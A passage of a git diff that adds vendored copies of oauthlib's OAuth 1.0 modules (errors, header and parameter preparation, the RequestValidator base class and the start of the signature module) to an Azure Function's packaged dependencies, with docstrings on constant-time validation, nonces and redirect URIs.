+ + request: Oauthlib Request object + """ + self.description = description or self.description + message = '({}) {}'.format(self.error, self.description) + if request: + message += ' ' + repr(request) + super().__init__(message) + + self.uri = uri + self.status_code = status_code + + def in_uri(self, uri): + return add_params_to_uri(uri, self.twotuples) + + @property + def twotuples(self): + error = [('error', self.error)] + if self.description: + error.append(('error_description', self.description)) + if self.uri: + error.append(('error_uri', self.uri)) + return error + + @property + def urlencoded(self): + return urlencode(self.twotuples) + + +class InsecureTransportError(OAuth1Error): + error = 'insecure_transport_protocol' + description = 'Only HTTPS connections are permitted.' + + +class InvalidSignatureMethodError(OAuth1Error): + error = 'invalid_signature_method' + + +class InvalidRequestError(OAuth1Error): + error = 'invalid_request' + + +class InvalidClientError(OAuth1Error): + error = 'invalid_client' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py new file mode 100644 index 0000000..4c3e98f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py @@ -0,0 +1,133 @@ +""" +oauthlib.parameters +~~~~~~~~~~~~~~~~~~~ + +This module contains methods related to `section 3.5`_ of the OAuth 1.0a spec. + +.. _`section 3.5`: https://tools.ietf.org/html/rfc5849#section-3.5 +""" +from urllib.parse import urlparse, urlunparse + +from oauthlib.common import extract_params, urlencode + +from . import utils + + +# TODO: do we need filter_params now that oauth_params are handled by Request? +# We can easily pass in just oauth protocol params. +@utils.filter_params +def prepare_headers(oauth_params, headers=None, realm=None): + """**Prepare the Authorization header.** + Per `section 3.5.1`_ of the spec. + + Protocol parameters can be transmitted using the HTTP "Authorization" + header field as defined by `RFC2617`_ with the auth-scheme name set to + "OAuth" (case insensitive). + + For example:: + + Authorization: OAuth realm="Example", + oauth_consumer_key="0685bd9184jfhq22", + oauth_token="ad180jjd733klru7", + oauth_signature_method="HMAC-SHA1", + oauth_signature="wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D", + oauth_timestamp="137131200", + oauth_nonce="4572616e48616d6d65724c61686176", + oauth_version="1.0" + + + .. _`section 3.5.1`: https://tools.ietf.org/html/rfc5849#section-3.5.1 + .. _`RFC2617`: https://tools.ietf.org/html/rfc2617 + """ + headers = headers or {} + + # Protocol parameters SHALL be included in the "Authorization" header + # field as follows: + authorization_header_parameters_parts = [] + for oauth_parameter_name, value in oauth_params: + # 1. Parameter names and values are encoded per Parameter Encoding + # (`Section 3.6`_) + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + escaped_name = utils.escape(oauth_parameter_name) + escaped_value = utils.escape(value) + + # 2. Each parameter's name is immediately followed by an "=" character + # (ASCII code 61), a """ character (ASCII code 34), the parameter + # value (MAY be empty), and another """ character (ASCII code 34). 
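+ # e.g. oauth_nonce="4572616e48616d6d65724c61686176"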
+ part = '{}="{}"'.format(escaped_name, escaped_value)
+
+ authorization_header_parameters_parts.append(part)
+
+ # 3. Parameters are separated by a "," character (ASCII code 44) and
+ # OPTIONAL linear whitespace per `RFC2617`_.
+ #
+ # .. _`RFC2617`: https://tools.ietf.org/html/rfc2617
+ authorization_header_parameters = ', '.join(
+ authorization_header_parameters_parts)
+
+ # 4. The OPTIONAL "realm" parameter MAY be added and interpreted per
+ # `RFC2617 section 1.2`_.
+ #
+ # .. _`RFC2617 section 1.2`: https://tools.ietf.org/html/rfc2617#section-1.2
+ if realm:
+ # NOTE: realm should *not* be escaped
+ authorization_header_parameters = ('realm="%s", ' % realm +
+ authorization_header_parameters)
+
+ # the auth-scheme name set to "OAuth" (case insensitive).
+ authorization_header = 'OAuth %s' % authorization_header_parameters
+
+ # contribute the Authorization header to the given headers
+ full_headers = {}
+ full_headers.update(headers)
+ full_headers['Authorization'] = authorization_header
+ return full_headers
+
+
+def _append_params(oauth_params, params):
+ """Append OAuth params to an existing set of parameters.
+
+ Both params and oauth_params must be lists of 2-tuples.
+
+ Per `section 3.5.2`_ and `3.5.3`_ of the spec.
+
+ .. _`section 3.5.2`: https://tools.ietf.org/html/rfc5849#section-3.5.2
+ .. _`3.5.3`: https://tools.ietf.org/html/rfc5849#section-3.5.3
+
+ """
+ merged = list(params)
+ merged.extend(oauth_params)
+ # The request URI / entity-body MAY include other request-specific
+ # parameters, in which case, the protocol parameters SHOULD be appended
+ # following the request-specific parameters, properly separated by an "&"
+ # character (ASCII code 38)
+ merged.sort(key=lambda i: i[0].startswith('oauth_'))
+ return merged
+
+
+def prepare_form_encoded_body(oauth_params, body):
+ """Prepare the Form-Encoded Body.
+
+ Per `section 3.5.2`_ of the spec.
+
+ .. _`section 3.5.2`: https://tools.ietf.org/html/rfc5849#section-3.5.2
+
+ """
+ # append OAuth params to the existing body
+ return _append_params(oauth_params, body)
+
+
+def prepare_request_uri_query(oauth_params, uri):
+ """Prepare the Request URI Query.
+
+ Per `section 3.5.3`_ of the spec.
+
+ .. _`section 3.5.3`: https://tools.ietf.org/html/rfc5849#section-3.5.3
+
+ """
+ # append OAuth params to the existing set of query components
+ sch, net, path, par, query, fra = urlparse(uri)
+ query = urlencode(
+ _append_params(oauth_params, extract_params(query) or []))
+ return urlunparse((sch, net, path, par, query, fra))
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py
new file mode 100644
index 0000000..2c24c8c
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py
@@ -0,0 +1,849 @@
+"""
+oauthlib.oauth1.rfc5849
+~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of various logic needed
+for signing and checking OAuth 1.0 RFC 5849 requests.
+"""
+from . import SIGNATURE_METHODS, utils
+
+
+class RequestValidator:
+
+ """A validator/datastore interaction base class for OAuth 1 providers.
+
+ OAuth providers should inherit from RequestValidator and implement the
+ methods and properties outlined below. Further details are provided in the
+ documentation for each method and property.
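+
+ A minimal sketch of a concrete validator (illustrative only; a real
+ provider must implement every method and property listed below)::
+
+ class ExampleValidator(RequestValidator):
+
+ def validate_client_key(self, client_key, request):
+ # self.clients is an illustrative datastore
+ return client_key in self.clients
+
+ @property
+ def dummy_client(self):
+ return 'dummyclientkey00000000'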
+
+ Methods used to check the format of input parameters. Common tests include
+ length, character set, membership, range or pattern. These tests are
+ referred to as `whitelisting or blacklisting`_. Whitelisting is better
+ but blacklisting can be useful to spot malicious activity.
+ The following methods have a default implementation:
+
+ - check_client_key
+ - check_request_token
+ - check_access_token
+ - check_nonce
+ - check_verifier
+ - check_realms
+
+ The methods above default to whitelist input parameters, checking that they
+ are alphanumerical and between a minimum and maximum length. Rather than
+ overloading the methods a few properties can be used to configure these
+ methods.
+
+ * @safe_characters -> (character set)
+ * @client_key_length -> (min, max)
+ * @request_token_length -> (min, max)
+ * @access_token_length -> (min, max)
+ * @nonce_length -> (min, max)
+ * @verifier_length -> (min, max)
+ * @realms -> [list, of, realms]
+
+ Methods used to validate/invalidate input parameters. These checks usually
+ hit either persistent or temporary storage such as databases or the
+ filesystem. See each method's documentation for detailed usage.
+ The following methods must be implemented:
+
+ - validate_client_key
+ - validate_request_token
+ - validate_access_token
+ - validate_timestamp_and_nonce
+ - validate_redirect_uri
+ - validate_requested_realms
+ - validate_realms
+ - validate_verifier
+ - invalidate_request_token
+
+ Methods used to retrieve sensitive information from storage.
+ The following methods must be implemented:
+
+ - get_client_secret
+ - get_request_token_secret
+ - get_access_token_secret
+ - get_rsa_key
+ - get_realms
+ - get_default_realms
+ - get_redirect_uri
+
+ Methods used to save credentials.
+ The following methods must be implemented:
+
+ - save_request_token
+ - save_verifier
+ - save_access_token
+
+ Methods used to verify input parameters. These methods are used while the
+ user authorizes the request token (AuthorizationEndpoint), to check that
+ parameters are valid. During token authorization the request is not
+ signed, thus the 'validation' methods cannot be used. The following
+ methods must be implemented:
+
+ - verify_realms
+ - verify_request_token
+
+ To prevent timing attacks it is necessary to not exit early even if the
+ client key or resource owner key is invalid. Instead dummy values should
+ be used during the remaining verification process. It is very important
+ that the dummy client and token are valid input parameters to the methods
+ get_client_secret, get_rsa_key and get_(access/request)_token_secret and
+ that the running time of those methods when given a dummy value remain
+ equivalent to the running time when given a valid client/resource owner.
+ The following properties must be implemented:
+
+ * @dummy_client
+ * @dummy_request_token
+ * @dummy_access_token
+
+ Example implementations have been provided, note that the database used is
+ a simple dictionary and serves only an illustrative purpose. Use whichever
+ database suits your project and how to access it is entirely up to you.
+ The methods are introduced in an order which should make understanding
+ their use more straightforward and as such it could be worth reading what
+ follows in chronological order.
+
+ .. _`whitelisting or blacklisting`: https://www.schneier.com/blog/archives/2011/01/whitelisting_vs.html
+ """
+
+ def __init__(self):
+ pass
+
+ @property
+ def allowed_signature_methods(self):
+ return SIGNATURE_METHODS
+
+ @property
+ def safe_characters(self):
+ return set(utils.UNICODE_ASCII_CHARACTER_SET)
+
+ @property
+ def client_key_length(self):
+ return 20, 30
+
+ @property
+ def request_token_length(self):
+ return 20, 30
+
+ @property
+ def access_token_length(self):
+ return 20, 30
+
+ @property
+ def timestamp_lifetime(self):
+ return 600
+
+ @property
+ def nonce_length(self):
+ return 20, 30
+
+ @property
+ def verifier_length(self):
+ return 20, 30
+
+ @property
+ def realms(self):
+ return []
+
+ @property
+ def enforce_ssl(self):
+ return True
+
+ def check_client_key(self, client_key):
+ """Check that the client key only contains safe characters
+ and is no shorter than lower and no longer than upper.
+ """
+ lower, upper = self.client_key_length
+ return (set(client_key) <= self.safe_characters and
+ lower <= len(client_key) <= upper)
+
+ def check_request_token(self, request_token):
+ """Checks that the request token contains only safe characters
+ and is no shorter than lower and no longer than upper.
+ """
+ lower, upper = self.request_token_length
+ return (set(request_token) <= self.safe_characters and
+ lower <= len(request_token) <= upper)
+
+ def check_access_token(self, request_token):
+ """Checks that the token contains only safe characters
+ and is no shorter than lower and no longer than upper.
+ """
+ lower, upper = self.access_token_length
+ return (set(request_token) <= self.safe_characters and
+ lower <= len(request_token) <= upper)
+
+ def check_nonce(self, nonce):
+ """Checks that the nonce contains only safe characters
+ and is no shorter than lower and no longer than upper.
+ """
+ lower, upper = self.nonce_length
+ return (set(nonce) <= self.safe_characters and
+ lower <= len(nonce) <= upper)
+
+ def check_verifier(self, verifier):
+ """Checks that the verifier contains only safe characters
+ and is no shorter than lower and no longer than upper.
+ """
+ lower, upper = self.verifier_length
+ return (set(verifier) <= self.safe_characters and
+ lower <= len(verifier) <= upper)
+
+ def check_realms(self, realms):
+ """Check that the realm is one of the set of allowed realms."""
+ return all(r in self.realms for r in realms)
+
+ def _subclass_must_implement(self, fn):
+ """
+ Returns a NotImplementedError for a function that should be implemented.
+ :param fn: name of the function
+ """
+ m = "Missing function implementation in {}: {}".format(type(self), fn)
+ return NotImplementedError(m)
+
+ @property
+ def dummy_client(self):
+ """Dummy client used when an invalid client key is supplied.
+
+ :returns: The dummy client key string.
+
+ The dummy client should be associated with either a client secret,
+ an RSA key or both depending on which signature methods are supported.
+ Providers should make sure that
+
+ get_client_secret(dummy_client)
+ get_rsa_key(dummy_client)
+
+ return a valid secret or key for the dummy client.
+
+ This method is used by
+
+ * AccessTokenEndpoint
+ * RequestTokenEndpoint
+ * ResourceEndpoint
+ * SignatureOnlyEndpoint
+ """
+ raise self._subclass_must_implement("dummy_client")
+
+ @property
+ def dummy_request_token(self):
+ """Dummy request token used when an invalid token was supplied.
+
+ :returns: The dummy request token string.
+
+ The dummy request token should be associated with a request token
+ secret such that get_request_token_secret(.., dummy_request_token)
+ returns a valid secret.
+
+ This method is used by
+
+ * AccessTokenEndpoint
+ """
+ raise self._subclass_must_implement("dummy_request_token")
+
+ @property
+ def dummy_access_token(self):
+ """Dummy access token used when an invalid token was supplied.
+
+ :returns: The dummy access token string.
+
+ The dummy access token should be associated with an access token
+ secret such that get_access_token_secret(.., dummy_access_token)
+ returns a valid secret.
+
+ This method is used by
+
+ * ResourceEndpoint
+ """
+ raise self._subclass_must_implement("dummy_access_token")
+
+ def get_client_secret(self, client_key, request):
+ """Retrieves the client secret associated with the client key.
+
+ :param client_key: The client/consumer key.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The client secret as a string.
+
+ This method must allow the use of a dummy client_key value.
+ Fetching the secret using the dummy key must take the same amount of
+ time as fetching a secret for a valid client::
+
+ # Unlikely to be near constant time as it uses two database
+ # lookups for a valid client, and only one for an invalid.
+ from your_datastore import ClientSecret
+ if ClientSecret.has(client_key):
+ return ClientSecret.get(client_key)
+ else:
+ return 'dummy'
+
+ # Aim to mimic number of latency inducing operations no matter
+ # whether the client is valid or not.
+ from your_datastore import ClientSecret
+ return ClientSecret.get(client_key, 'dummy')
+
+ Note that the returned key must be in plaintext.
+
+ This method is used by
+
+ * AccessTokenEndpoint
+ * RequestTokenEndpoint
+ * ResourceEndpoint
+ * SignatureOnlyEndpoint
+ """
+ raise self._subclass_must_implement('get_client_secret')
+
+ def get_request_token_secret(self, client_key, token, request):
+ """Retrieves the shared secret associated with the request token.
+
+ :param client_key: The client/consumer key.
+ :param token: The request token string.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The token secret as a string.
+
+ This method must allow the use of dummy values and the running time
+ must be roughly equivalent to the running time for valid values::
+
+ # Unlikely to be near constant time as it uses two database
+ # lookups for a valid client, and only one for an invalid.
+ from your_datastore import RequestTokenSecret
+ if RequestTokenSecret.has(client_key):
+ return RequestTokenSecret.get((client_key, request_token))
+ else:
+ return 'dummy'
+
+ # Aim to mimic number of latency inducing operations no matter
+ # whether the client is valid or not.
+ from your_datastore import RequestTokenSecret
+ return RequestTokenSecret.get((client_key, request_token), 'dummy')
+
+ Note that the returned key must be in plaintext.
+
+ This method is used by
+
+ * AccessTokenEndpoint
+ """
+ raise self._subclass_must_implement('get_request_token_secret')
+
+ def get_access_token_secret(self, client_key, token, request):
+ """Retrieves the shared secret associated with the access token.
+
+ :param client_key: The client/consumer key.
+ :param token: The access token string.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The token secret as a string.
+
+ This method must allow the use of dummy values and the running time
+ must be roughly equivalent to the running time for valid values::
+
+ # Unlikely to be near constant time as it uses two database
+ # lookups for a valid client, and only one for an invalid.
+ from your_datastore import AccessTokenSecret
+ if AccessTokenSecret.has(client_key):
+ return AccessTokenSecret.get((client_key, request_token))
+ else:
+ return 'dummy'
+
+ # Aim to mimic number of latency inducing operations no matter
+ # whether the client is valid or not.
+ from your_datastore import AccessTokenSecret
+ return AccessTokenSecret.get((client_key, request_token), 'dummy')
+
+ Note that the returned key must be in plaintext.
+
+ This method is used by
+
+ * ResourceEndpoint
+ """
+ raise self._subclass_must_implement("get_access_token_secret")
+
+ def get_default_realms(self, client_key, request):
+ """Get the default realms for a client.
+
+ :param client_key: The client/consumer key.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The list of default realms associated with the client.
+
+ The list of default realms will be set during client registration and
+ is outside the scope of OAuthLib.
+
+ This method is used by
+
+ * RequestTokenEndpoint
+ """
+ raise self._subclass_must_implement("get_default_realms")
+
+ def get_realms(self, token, request):
+ """Get realms associated with a request token.
+
+ :param token: The request token string.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The list of realms associated with the request token.
+
+ This method is used by
+
+ * AuthorizationEndpoint
+ * AccessTokenEndpoint
+ """
+ raise self._subclass_must_implement("get_realms")
+
+ def get_redirect_uri(self, token, request):
+ """Get the redirect URI associated with a request token.
+
+ :param token: The request token string.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The redirect URI associated with the request token.
+
+ It may be desirable to return a custom URI if the redirect is set to "oob".
+ In this case, the user will be redirected to the returned URI and at that
+ endpoint the verifier can be displayed.
+
+ This method is used by
+
+ * AuthorizationEndpoint
+ """
+ raise self._subclass_must_implement("get_redirect_uri")
+
+ def get_rsa_key(self, client_key, request):
+ """Retrieves a previously stored client provided RSA key.
+
+ :param client_key: The client/consumer key.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: The RSA public key as a string.
+
+ This method must allow the use of a dummy client_key value. Fetching
+ the rsa key using the dummy key must take the same amount of time
+ as fetching a key for a valid client. The dummy key must also be of
+ the same bit length as client keys.
+
+ Note that the key must be returned in plaintext.
+
+ This method is used by
+
+ * AccessTokenEndpoint
+ * RequestTokenEndpoint
+ * ResourceEndpoint
+ * SignatureOnlyEndpoint
+ """
+ raise self._subclass_must_implement("get_rsa_key")
+
+ def invalidate_request_token(self, client_key, request_token, request):
+ """Invalidates a used request token.
+
+ :param client_key: The client/consumer key.
+ :param request_token: The request token string.
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :returns: None
+
+ Per `Section 2.3`_ of the spec:
+
+ "The server MUST (...) ensure that the temporary
+        credentials have not expired or been used before."
+
+        .. _`Section 2.3`: https://tools.ietf.org/html/rfc5849#section-2.3
+
+        This method should ensure that the provided token will no longer
+        validate. This can be achieved by simply removing the RequestToken
+        from storage, or by setting a specific flag that marks it as invalid
+        (note that such a flag should also be checked during request token
+        validation).
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        """
+        raise self._subclass_must_implement("invalidate_request_token")
+
+    def validate_client_key(self, client_key, request):
+        """Validates that supplied client key is a registered and valid client.
+
+        :param client_key: The client/consumer key.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        Note that if the dummy client is supplied it should validate in the
+        same or nearly the same amount of time as a valid one.
+
+        Ensure latency inducing tasks are mimicked even for dummy clients.
+        For example, use::
+
+            from your_datastore import Client
+            try:
+                return Client.exists(client_key)
+            except DoesNotExist:
+                return False
+
+        Rather than::
+
+            from your_datastore import Client
+            if client_key == self.dummy_client:
+                return False
+            else:
+                return Client.exists(client_key)
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        * RequestTokenEndpoint
+        * ResourceEndpoint
+        * SignatureOnlyEndpoint
+        """
+        raise self._subclass_must_implement("validate_client_key")
+
+    def validate_request_token(self, client_key, token, request):
+        """Validates that supplied request token is registered and valid.
+
+        :param client_key: The client/consumer key.
+        :param token: The request token string.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        Note that if the dummy request_token is supplied it should validate in
+        the same or nearly the same amount of time as a valid one.
+
+        Ensure latency inducing tasks are mimicked even for dummy tokens.
+        For example, use::
+
+            from your_datastore import RequestToken
+            try:
+                return RequestToken.exists(client_key, token)
+            except DoesNotExist:
+                return False
+
+        Rather than::
+
+            from your_datastore import RequestToken
+            if token == self.dummy_request_token:
+                return False
+            else:
+                return RequestToken.exists(client_key, token)
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        """
+        raise self._subclass_must_implement("validate_request_token")
+
+    def validate_access_token(self, client_key, token, request):
+        """Validates that supplied access token is registered and valid.
+
+        :param client_key: The client/consumer key.
+        :param token: The access token string.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        Note that if the dummy access token is supplied it should validate in
+        the same or nearly the same amount of time as a valid one.
+
+        Ensure latency inducing tasks are mimicked.
+
+        For example, use::
+
+            from your_datastore import AccessToken
+            try:
+                return AccessToken.exists(client_key, token)
+            except DoesNotExist:
+                return False
+
+        Rather than::
+
+            from your_datastore import AccessToken
+            if token == self.dummy_access_token:
+                return False
+            else:
+                return AccessToken.exists(client_key, token)
+
+        This method is used by
+
+        * ResourceEndpoint
+        """
+        raise self._subclass_must_implement("validate_access_token")
+
+    def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,
+                                     request, request_token=None, access_token=None):
+        """Validates that the nonce has not been used before.
+
+        :param client_key: The client/consumer key.
+        :param timestamp: The ``oauth_timestamp`` parameter.
+        :param nonce: The ``oauth_nonce`` parameter.
+        :param request_token: Request token string, if any.
+        :param access_token: Access token string, if any.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        Per `Section 3.3`_ of the spec.
+
+        "A nonce is a random string, uniquely generated by the client to allow
+        the server to verify that a request has never been made before and
+        helps prevent replay attacks when requests are made over a non-secure
+        channel. The nonce value MUST be unique across all requests with the
+        same timestamp, client credentials, and token combinations."
+
+        .. _`Section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3
+
+        One of the first validation checks that will be made is for the validity
+        of the nonce and timestamp, which are associated with a client key and
+        possibly a token. If either is invalid, immediately fail the request
+        by returning False. If the nonce/timestamp pair has been used before,
+        you may just have detected a replay attack. It is therefore an essential
+        part of OAuth security that you not allow nonce/timestamp reuse.
+        Note that this validation check is done before checking the validity of
+        the client and token::
+
+            nonces_and_timestamps_database = [
+                (u'foo', 1234567890, u'rannoMstrInghere', u'bar')
+            ]
+
+            def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,
+                                             request_token=None, access_token=None):
+
+                return ((client_key, timestamp, nonce, request_token or access_token)
+                        not in self.nonces_and_timestamps_database)
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        * RequestTokenEndpoint
+        * ResourceEndpoint
+        * SignatureOnlyEndpoint
+        """
+        raise self._subclass_must_implement("validate_timestamp_and_nonce")
+
+    def validate_redirect_uri(self, client_key, redirect_uri, request):
+        """Validates the client supplied redirection URI.
+
+        :param client_key: The client/consumer key.
+        :param redirect_uri: The URI the client wishes to redirect back to
+                             after authorization is successful.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        It is highly recommended that OAuth providers require their clients
+        to register all redirection URIs prior to using them in requests and
+        register them as absolute URIs. See `CWE-601`_ for more information
+        about open redirection attacks.
+
+        By requiring registration of all redirection URIs it should be
+        straightforward for the provider to verify whether the supplied
+        redirect_uri is valid or not.
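+
+        As a hedged illustration only (``Client`` and its ``redirect_uris``
+        attribute are assumed datastore names, not part of OAuthLib), exact
+        matching against registered absolute URIs can be as simple as::
+
+            from your_datastore import Client
+            client = Client.get(client_key, None)
+            return client is not None and redirect_uri in client.redirect_uris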
+
+        Alternatively per `Section 2.1`_ of the spec:
+
+        "If the client is unable to receive callbacks or a callback URI has
+        been established via other means, the parameter value MUST be set to
+        "oob" (case sensitive), to indicate an out-of-band configuration."
+
+        .. _`CWE-601`: http://cwe.mitre.org/top25/index.html#CWE-601
+        .. _`Section 2.1`: https://tools.ietf.org/html/rfc5849#section-2.1
+
+        This method is used by
+
+        * RequestTokenEndpoint
+        """
+        raise self._subclass_must_implement("validate_redirect_uri")
+
+    def validate_requested_realms(self, client_key, realms, request):
+        """Validates that the client may request access to the realm.
+
+        :param client_key: The client/consumer key.
+        :param realms: The list of realms that client is requesting access to.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        This method is invoked when obtaining a request token and should
+        tie a realm to the request token; after user authorization this
+        realm restriction should transfer to the access token.
+
+        This method is used by
+
+        * RequestTokenEndpoint
+        """
+        raise self._subclass_must_implement("validate_requested_realms")
+
+    def validate_realms(self, client_key, token, request, uri=None,
+                        realms=None):
+        """Validates access to the request realm.
+
+        :param client_key: The client/consumer key.
+        :param token: A request token string.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :param uri: The URI the realm is protecting.
+        :param realms: A list of realms that must have been granted to
+                       the access token.
+        :returns: True or False
+
+        How providers choose to use the realm parameter is outside the OAuth
+        specification, but it is commonly used to restrict access to a subset
+        of protected resources such as "photos".
+
+        ``realms`` is a convenience parameter which can be used to provide
+        a per-view-method pre-defined list of allowed realms.
+
+        Can be as simple as::
+
+            from your_datastore import RequestToken
+            request_token = RequestToken.get(token, None)
+
+            if not request_token:
+                return False
+            return set(request_token.realms).issuperset(set(realms))
+
+        This method is used by
+
+        * ResourceEndpoint
+        """
+        raise self._subclass_must_implement("validate_realms")
+
+    def validate_verifier(self, client_key, token, verifier, request):
+        """Validates a verification code.
+
+        :param client_key: The client/consumer key.
+        :param token: A request token string.
+        :param verifier: The authorization verifier string.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        OAuth providers issue a verification code to clients after the
+        resource owner authorizes access. This code is used by the client to
+        obtain token credentials and the provider must verify that the
+        verifier is valid and associated with the client as well as the
+        resource owner.
+
+        Verifier validation should be done in near constant time
+        (to avoid verifier enumeration). To achieve this we need a
+        constant time string comparison, which is provided by OAuthLib
+        in ``oauthlib.common.safe_string_equals``::
+
+            from your_datastore import Verifier
+            correct_verifier = Verifier.get(client_key, request_token)
+            from oauthlib.common import safe_string_equals
+            return safe_string_equals(verifier, correct_verifier)
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        """
+        raise self._subclass_must_implement("validate_verifier")
+
+    def verify_request_token(self, token, request):
+        """Verify that the given OAuth1 request token is valid.
+
+        :param token: A request token string.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        This method is used only in AuthorizationEndpoint to check whether the
+        oauth_token given in the authorization URL is valid or not.
+        This request is not signed and thus the similar
+        ``validate_request_token`` method can not be used.
+
+        This method is used by
+
+        * AuthorizationEndpoint
+        """
+        raise self._subclass_must_implement("verify_request_token")
+
+    def verify_realms(self, token, realms, request):
+        """Verify authorized realms to see if they match those given to token.
+
+        :param token: An access token string.
+        :param realms: A list of realms the client attempts to access.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: True or False
+
+        This prevents the list of authorized realms sent by the client during
+        the authorization step from being altered to include realms outside
+        what was bound with the request token.
+
+        Can be as simple as::
+
+            valid_realms = self.get_realms(token, request)
+            return all((r in valid_realms for r in realms))
+
+        This method is used by
+
+        * AuthorizationEndpoint
+        """
+        raise self._subclass_must_implement("verify_realms")
+
+    def save_access_token(self, token, request):
+        """Save an OAuth1 access token.
+
+        :param token: A dict with token credentials.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        The token dictionary will at minimum include
+
+        * ``oauth_token`` the access token string.
+        * ``oauth_token_secret`` the token specific secret used in signing.
+        * ``oauth_authorized_realms`` a space separated list of realms.
+
+        The client key can be obtained from ``request.client_key``.
+
+        The list of realms (not a joined string) can be obtained from
+        ``request.realm``.
+
+        This method is used by
+
+        * AccessTokenEndpoint
+        """
+        raise self._subclass_must_implement("save_access_token")
+
+    def save_request_token(self, token, request):
+        """Save an OAuth1 request token.
+
+        :param token: A dict with token credentials.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        The token dictionary will at minimum include
+
+        * ``oauth_token`` the request token string.
+        * ``oauth_token_secret`` the token specific secret used in signing.
+        * ``oauth_callback_confirmed`` the string ``true``.
+
+        The client key can be obtained from ``request.client_key``.
+
+        This method is used by
+
+        * RequestTokenEndpoint
+        """
+        raise self._subclass_must_implement("save_request_token")
+
+    def save_verifier(self, token, verifier, request):
+        """Associate an authorization verifier with a request token.
+
+        :param token: A request token string.
+        :param verifier: A dictionary containing the oauth_verifier and
+                         oauth_token.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        We need to associate verifiers with tokens for validation during the
+        access token request.
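+
+        A minimal sketch, assuming a simple key/value store (``verifiers`` is
+        a hypothetical attribute, not part of OAuthLib)::
+
+            def save_verifier(self, token, verifier, request):
+                self.verifiers[token] = verifier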
+
+        Note that unlike the save_x_token methods, ``token`` here is the
+        ``oauth_token`` string from the previously saved request token.
+
+        This method is used by
+
+        * AuthorizationEndpoint
+        """
+        raise self._subclass_must_implement("save_verifier")
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py
new file mode 100644
index 0000000..d648102
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py
@@ -0,0 +1,843 @@
+"""
+This module is an implementation of `section 3.4`_ of RFC 5849.
+
+**Usage**
+
+Steps for signing a request:
+
+1. Collect parameters from the request using ``collect_parameters``.
+2. Normalize those parameters using ``normalize_parameters``.
+3. Create the *base string URI* using ``base_string_uri``.
+4. Create the *signature base string* from the above three components
+   using ``signature_base_string``.
+5. Pass the *signature base string* and the client credentials to one of the
+   sign-with-client functions. The HMAC-based signing functions need
+   client credentials with secrets. The RSA-based signing functions need
+   client credentials with an RSA private key.
+
+To verify a request, pass the request and credentials to one of the verify
+functions. The HMAC-based verify functions need the shared secrets. The
+RSA-based verify functions need the RSA public key.
+
+**Scope**
+
+All of the functions in this module should be considered internal to OAuthLib,
+since they are not imported into the "oauthlib.oauth1" module. Programs using
+OAuthLib should not directly invoke any of the functions in this module.
+
+**Deprecated functions**
+
+The "sign_" functions that are not "_with_client" have been deprecated. They
+may be removed in a future release. Since they are all internal functions,
+this should have no impact on properly behaving programs.
+
+.. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4
+"""
+
+import binascii
+import hashlib
+import hmac
+import logging
+import warnings
+
+from oauthlib.common import extract_params, safe_string_equals, urldecode
+import urllib.parse as urlparse
+
+from . import utils
+
+
+log = logging.getLogger(__name__)
+
+
+# ==== Common functions ==========================================
+
+def signature_base_string(
+        http_method: str,
+        base_str_uri: str,
+        normalized_encoded_request_parameters: str) -> str:
+    """
+    Construct the signature base string.
+
+    The *signature base string* is the value that is calculated and signed by
+    the client. It is also independently calculated by the server to verify
+    the signature, and therefore must produce the exact same value at both
+    ends or the signature won't verify.
+
